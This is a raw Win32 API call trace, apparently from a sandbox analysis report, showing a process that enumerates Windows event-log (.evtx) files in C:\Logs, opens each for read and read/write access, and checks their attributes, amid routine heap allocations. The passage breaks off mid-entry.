InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.792] AreFileApisANSI () returned 1 [0071.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpUsedDefaultChar=0x0) returned 52 [0071.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.792] AreFileApisANSI () returned 1 [0071.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0071.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0071.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=52 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 52 [0071.792] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.792] GetFileType (hFile=0x428) returned 0x1 [0071.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0071.792] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.793] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.793] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.793] CloseHandle (hObject=0x428) returned 1 [0071.793] AreFileApisANSI () returned 1 [0071.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0071.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0071.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=52 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 52 [0071.793] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.793] GetFileType (hFile=0x428) returned 0x1 [0071.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0071.793] CloseHandle (hObject=0x428) returned 1 [0071.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.794] AreFileApisANSI () returned 1 [0071.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0071.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=52 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 52 [0071.794] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.794] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cAlternateFileName="MI9F85~1.EVT")) returned 1 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0071.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0071.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0071.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.795] AreFileApisANSI () returned 1 [0071.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpUsedDefaultChar=0x0) returned 58 [0071.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.796] AreFileApisANSI () returned 1 [0071.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0071.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 58 [0071.796] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.906] GetFileType (hFile=0x410) returned 0x1 [0071.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.906] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.907] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.907] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.907] CloseHandle (hObject=0x410) returned 1 [0071.907] AreFileApisANSI () returned 1 [0071.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0071.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 58 [0071.907] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.907] GetFileType (hFile=0x410) returned 0x1 [0071.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.907] CloseHandle (hObject=0x410) returned 1 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.908] AreFileApisANSI () returned 1 [0071.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a630 [0071.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 58 [0071.908] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.908] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.908] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.908] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cAlternateFileName="MIBE3D~1.EVT")) returned 1 [0071.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0071.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0071.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0071.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.910] AreFileApisANSI () returned 1 [0071.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpUsedDefaultChar=0x0) returned 68 [0071.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0071.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 